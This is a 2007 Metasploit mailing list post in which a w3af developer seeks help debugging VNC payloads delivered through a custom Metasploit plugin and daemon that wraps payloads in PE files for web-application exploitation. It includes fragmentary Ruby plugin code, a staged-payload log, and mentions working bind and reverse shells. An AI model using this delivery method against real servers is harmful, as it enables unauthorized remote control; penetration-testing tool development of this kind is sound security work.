Metasploit mailing list archives

Re: VNC payload problems

From: andres.riancho at (Andres Riancho)
Date: Tue, 25 Sep 2007 17:34:31 -0300

plugin code:

    def exploit
        # Connect to the vdaemon and send the payload
        vdaemonSock = connect(false, { 'RPORT' => 9091 , 'RHOST' => '' })
        # Say hi!

        remoteIP = vdaemonSock.get_once
        print_status("The remote IP address is: #{remoteIP}")
        print_status("Using remote IP address to create payloads.")

        print_status("Sent payload to vdaemon.")

        if ( == 'Windows' )
            response = vdaemonSock.get_once
            print_status("The estimated time to wait for PE transfer is:
#{response} seconds.")
            sleep( response.to_i )

        # Get how much time to wait
        response = vdaemonSock.get_once
        # wait for the crontab/at to run
        if response.length > 2
            print_status("vdaemon says: #{response}")
            print_status("Going to sleep for #{response} seconds (waiting
for crontab/at to execute payload).")
            sleep( response.to_i )
            print_status("Done waiting!")

            print_status("Starting handler")

On 9/25/07, Andres Riancho <andres.riancho at> wrote:

Hi list,

    I'm trying to do something really odd with metasploit (so I think this
is the correct list =). I'm trying to integrate MSF and w3af in order to be
able to use all MSF payloads while exploiting web applications (sql
injection, osCommanding, and anything that gets me a remote shell).

    To do that, I coded a metasploit plugin (see code below) and a virtual
daemon. The virtual daemon listens on port 9091 and receives the msf plugin
connections, the msf plugin sends the payload to the virtual daemon; when
the virtual daemon gets the payload, it wraps the payload in an PE file.
That PE file is sent to the server i REALLY want to exploit using some
non-important method and then it gets executed. Using this method I have
been able to use the following payloads successfully:
        - create "metasploit" user
        - bind a shell
        - reverse shell

    The problem I have is with the VNC payloads, they are simply not
working. This is the log I get when exploiting this:

[*] Started bind handler
[*] The remote IP address is:
[*] Using remote IP address to create payloads.
[*] Sent payload to vdaemon.
[*] The estimated time to wait for PE transfer is: 7.0 seconds.
[*] Sleeping... [*] Going to sleep for 02 seconds (waiting for crontab/at
to execute payload).
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Done waiting!
[*] Starting handler
[*] Uploading DLL (340049 bytes)...
[*] Upload completed.
[*] Starting local TCP relay on  Local TCP relay
[*] Launched vnciewer in the background.
[*] VNC Server session 1 opened ( ->
[*] Using already established connection.
[*] VNC connection closed.
[*] VNC Server session 1 closed.

    As far as I know, the DLL is successfully sent to the remote server
and it's working ( the MSF courtesy shell pops up in the remote windows ).
The problem is that the VNC session closes... and I see this on the console:

VNC viewer version 3.3.7 - built Mar  8 2007 21:56:52
Copyright (C) 2002-2003 RealVNC Ltd.
Copyright (C) 1994-2000 AT&T Laboratories Cambridge.
See for information on VNC.
ReadFromRFBServer: rdr::EndOfStream

   Neither bind and reverse VNC are working. I think that the problem is
with the TCP relay... any ideas on why this ain't working? How can I debug
the multistage payload (the .exe on the remote server) ?

Andres Riancho
Web Application Attack and Audit Framework

Andres Riancho
Web Application Attack and Audit Framework
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